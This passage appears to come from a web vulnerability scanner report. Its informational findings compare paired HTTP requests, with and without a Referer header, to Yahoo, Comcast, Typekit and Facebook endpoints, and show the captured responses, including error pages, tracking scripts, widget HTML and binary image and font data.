Date: Tue, 06 Sep 2011 12:52:34 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff
on this server.</p>
</body></html>

13.5. http://ichart.finance.yahoo.com/instrument/1.0/%5EDJI/chart  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ichart.finance.yahoo.com
Path:   /instrument/1.0/%5EDJI/chart

Request 1

GET /instrument/1.0/%5EDJI/chart;range=1d/image;size=200x101 HTTP/1.1
Host: ichart.finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 6 Sep 2011 12:29:48 GMT
Expires: Tue, 6 Sep 2011 12:30:48 GMT
Content-Length: 3587
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.......e.......;....IDATx...{t....3;..d.5Y.4..`[N.HO..p....!EO%X..cI..>....V...s.B....("...R^.G .....<.@.    ....l6..c....7...Ivf6.......;......k..F...P.......BE...k.m....&e.fd.44:J._...?..U%.*H.'..555.yO.5RSS....}o.y........1...G..r.=o...y.>...d..`{...(1':zhjjj"I.>.1YHz.6 ...cK.+D6f....?..hue/...uqf...>..H..I...L=...S.j.C.....*..e..........NW....u..O-.. ....B.D.L}.c......u".....{... .9x.w.ra...u....s..=....K...Ra)Kl:&...M.........BJ......:Cn.0.*.s......x..y..2mDN.....y{.+....h.....WU7"#mD.\W(..P..x........o}...^.Q.......^.....t..o<.ld..d.2.Sz....a...D..=u.....9...`.......#'.7..........^dX........
...Z......LF._.Lxg.n..+..a.t..S....3.N.^.....l.p...f[..kk6..}.^K......u.>W.........M.m.wY.v.....V....7........G....../n0...3..._.Kol...O..,3..Rz.. ....Cl.P.uL&*xE..(.@.EQ.*,."PaQ..
...TX.E...(...E...(.@.EQ.*,."PaQ....
..W..2r. .    ..J.    ...ws.).
g.    ...7[..;    J..&.r:Vdc.l(.|b$z.S.    qf.%.(........jms....YPz.E{..*.....3..x^..t.|...|>..8._X...d1y..=fWy.....*..Y..^.......k.B......zn...YY.....h.....?......'.;.QM.c.Pu.j...........U{ckT...i........J/./....!.Q(........J.t.....-%z......5.>{..(.....E ..TX..A.B."tz/.F3.#.D.N...J.V~Pz.~a1.SUsCCW(.    "b1lMm.v.Pz.d.bk.Z4t%4...M.....a.l.=v...-/..../,...=|YCW.......K.S..dp:s....
xD.._X:...|...!e..]......2..2........."b.x.bBX..>n9..F......3.H?zf>2....@...D..q..aE.n.e.....J..N^..*8h..X......2.l.).'%.Ha.r_p .J7........9...z.%0.).ek...p[[......>....k7.5.<..p..5....X.A.....t4......(v.8..9.>..2[lNG...gi.R.4\;.....[.t3N).K........    .vC......rW......\.t....A7...Y..    ^o6..=.v.ip...5'..m..
.Yt..D.......P...0..)..7...3~3,..
...[SNIP]...

Request 2

GET /instrument/1.0/%5EDJI/chart;range=1d/image;size=200x101 HTTP/1.1
Host: ichart.finance.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 12:29:49 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3268

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 403 Forbidden</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/403/*http://www.yahoo.com"><img
src=http://l.yimg.com/a/i/yahoo.gif
width=147 height=31 border=0 alt="Yahoo!"></a><div><a
href="http://us.rd
...[SNIP]...

13.6. http://sitesearch.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitesearch.comcast.com
Path:   /

Request 1

GET /?q=internet+phone&cat=com HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:23 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 47083
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
omcast.com Search - Version B";
s.events = "event11,event9";
s.eVar41 = "internet phone";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "internet phone";
s.prop19 = "http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
break;
case "pres":
s.eVar42 = "press release";
break;
case "blog":
s.eVar42 = "community results";
break;
default:
s.eVar42 = "all results";
}


/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code = s.t(); if (s_code) document.write(s_code)
//-->
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>

<!-- BEGIN BAYNOTE INCLUDE -->
<script type="text/javascript" src="static/baynote.js" defer="defer" ></script>
<!-- END BAYNOTE INCLUDE -->

</body>
</html>

Request 2

GET /?q=internet+phone&cat=com HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:53 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 46991
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
omcast.com Search - Version B";
s.events = "event11,event9";
s.eVar41 = "internet phone";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "internet phone";
s.prop19 = "no referrer";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
break;
case "pres":
s.eVar42 = "press release";
break;
case "blog":
s.eVar42 = "community results";
break;
default:
s.eVar42 = "all results";
}


/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code = s.t(); if (s_code) document.write(s_code)
//-->
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>

<!-- BEGIN BAYNOTE INCLUDE -->
<script type="text/javascript" src="static/baynote.js" defer="defer" ></script>
<!-- END BAYNOTE INCLUDE -->

</body>
</html>

13.7. http://use.typekit.com/k/apb3goi-d.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/apb3goi-d.css

Request 1

GET /k/apb3goi-d.css?3bb2a6e53c9684ffdc9a9af11f5b2a6290826e84c363a71fe46ed264f6c649f62b8595e0db1d36c453d7bbbb60e604aa52c910b56cd760b7906ce7a98c58b034d7fba1386a91a6f05e49cd HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Tue, 06 Sep 2011 12:26:24 GMT
ETag: "1623686887+gzip"
Expires: Tue, 06 Sep 2011 12:31:24 GMT
Last-Modified: Wed, 20 Jul 2011 14:05:22 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 190755

/*{"mac":"1:eea25b3c716176f4908aa0a2369d2bedd7312389c116bec7818805034c97b57b","version":"5167863","created":"2011-07-20T14:05:23Z","k":"0.9.12"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name Myriad Pro
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/8e02145c28/eula
*
* (c) 2011 Typekit, Inc.
*/

@font-face {
font-family:"myriad-pro";
src:url(data:font/opentype;base64,d09GRgABAAAAAFrYABMAAAAA0DQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCQVNFAABacAAAAEoAAACIZNpdAkZGVE0AAFq8AAAAHAAAABxY5fS3R0RFRgAASHAAAAApAAAALAIIAQhHUE9TAABJOAAAETgAADU8BTHysEdTVUIAAEicAAAAnAAAAPKA2VieT1MvMgAAAhwAAABZAAAAYF2Dt6ljbWFwAAAEeAAAAVUAAAGSJ4/IGGN2dCAAAAcoAAAAMAAAADAJigNtZnBnbQAABdAAAAECAAABcwZZnDdnYXNwAABIaAAAAAgAAAAI//8AA2dseWYAAAj8AAA8AwAAiNxZ12zbaGVhZAAAAagAAAA0AAAANvZezSloaGVhAAAB3AAAAB8AAAAkB1gDmGhtdHgAAAJ4AAAB/wAAA0CHHCBXbG9jYQAAB1gAAAGiAAABogcs5YRtYXhwAAAB/AAAACAAAAAgAuABCG5hbWUAAEUAAAACAwAAA+SY8gE8cG9zdAAARwQAAAFjAAAB1wIlEIJwcmVwAAAG1AAAAFEAAABg9Ra6xXjaY2BkYGBgEj30j2FiYjy/zVcGeeYXQBGGk8d2scPo/5f/szGfYs4DcjkYmECiAJf9DjN42mNgZGBg3vGfDUi++H/5/03mUwxAERRwAQCvJAf1AAABAAAA0ABXAAUAAAAAAAEAAAAAAAoAAAIAALAAAAAAeNpjYGF8wjiBgZWBgamLKYKBgcEbQjPGMRgxKgFFuVmZmVmYmZhYFBiY2oHyjAxQ4Oji5MrowKCgqMQs8d+AgYF5B8MvBQbG+SA5xidMi4CUAgMzACRDDDcAAAB42m2STWtTQRSG3zO3UhU/ahusrUmkyW1q2qiUFGKtFG2M
...[SNIP]...

Request 2

GET /k/apb3goi-d.css?3bb2a6e53c9684ffdc9a9af11f5b2a6290826e84c363a71fe46ed264f6c649f62b8595e0db1d36c453d7bbbb60e604aa52c910b56cd760b7906ce7a98c58b034d7fba1386a91a6f05e49cd HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 06 Sep 2011 12:26:30 GMT
Expires: Tue, 06 Sep 2011 12:31:30 GMT
Server: ECS (sjo/5235)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>

13.8. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.35.43
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 25783

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e660b2c9a6249745044162" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">8</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">7</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"4c0e1f07",fb_dtsg:"AQAYOj0A",no_cookies:1,lhsh:"8AQAgPw2r"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f350110394&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/servicetips.whitefence.com\/","pageId":null,"widgetID":"connect_widget_4e660b2c9a6249745044162","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","sho
...[SNIP]...

Request 2

GET /plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.51.41
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:48 GMT
Content-Length: 25748

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e660b34e26257359423897" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">8</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">7</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"ea8d7d0d",fb_dtsg:"AQAYOj0A",no_cookies:1,lhsh:"aAQC_ClyB"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f350110394&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/servicetips.whitefence.com\/","pageId":null,"widgetID":"connect_widget_4e660b34e26257359423897","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","sho
...[SNIP]...

13.9. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.38
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:17 GMT
Content-Length: 8244

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e6615dd59b5b2a87228642" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">37,477</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.137.52
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:26 GMT
Content-Length: 8217

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
